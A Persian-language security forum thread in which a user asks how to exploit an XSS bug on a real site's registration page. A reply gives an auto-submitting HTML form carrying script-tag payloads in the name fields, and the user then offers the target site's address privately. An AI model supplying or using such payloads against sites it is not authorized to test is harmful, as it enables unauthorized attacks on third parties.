رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام چطور میشه از باگ xss  استفاده کرد مثلا من میدونم تو صفحه ریجستر یه سایت این باگ هست

Capture.PNG.ccf0c271627787610c48d69635a8af30.PNG

مثلا الان توی url  چی بنویسم alert بده؟

ممنون

(البته به هیچ وجه نمیخوام این سایتو هک یا دیفیس کنم فقط میخوام xss  تمرین کنم) 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

در 7 ساعت قبل، Balcon گفته است :

سلام چطور میشه از باگ xss  استفاده کرد مثلا من میدونم تو صفحه ریجستر یه سایت این باگ هست

Capture.PNG.ccf0c271627787610c48d69635a8af30.PNG

مثلا الان توی url  چی بنویسم alert بده؟

ممنون

(البته به هیچ وجه نمیخوام این سایتو هک یا دیفیس کنم فقط میخوام xss  تمرین کنم) 

با سلام 

خدایش شرمنده نبودم 

<html><form enctype='application/x-www-form-urlencoded' method='POST' name="myForm" id="myForm" action='ادرس فرم ثبت نام'><table><tr><td><input type='text' value='create_customer' name='form_type'></td></tr>
<tr><td><input type='text' value='✓' name='utf8'></td></tr>
<tr><td><input type='text' value='synack"><script>alert(1)</script>' name='[first_name]'></td></tr>
<tr><td><input type='text' value='ln"><script>alert(2)</script>' name='[last_name]'></td></tr>
<tr><td><input type='text' value='test@gmail.com' name='[email]'></td></tr>
<tr><td><input type='text' value='' name='customer[password]'></td></tr>
</table><input type='submit' value='click'></form></html>

<script>

    var auto_refresh = setInterval(
    function()
    {
    submitform();
    }, 10000);

    function submitform()
    {
      
      document.myForm.submit();
    }
    </script>

دوست عزیز تارکت ایرانی نداریم حتی  برای کنچگاوی یا چیزی اما من سوال شمارو یه طور دیگه جواب میدم 

در کد بالا من فرض کردم که این فرم شماست اگر دقت کنید به valueهای این تکه کد متوجه میشید که ما در کدمورد نظر کد xss ارسالی رو قرار دادیم تا پس از submitکردن برامون برگردونه

نکته : جهت اطلاع این کد کامل نیت و فقط برای درک شما میباشد

 

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام  خوشحالم دوباره میبینمتون 

مشکل اینه من همین کاری که میگیدو میکنم ولی صفحه رییجستر خود به خود ریدایرکت میشه به لاگین 😶😑

میشه توی پیام خصوصی کمک کنین آدرس سایتو بدم؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
  • اضافه کردن...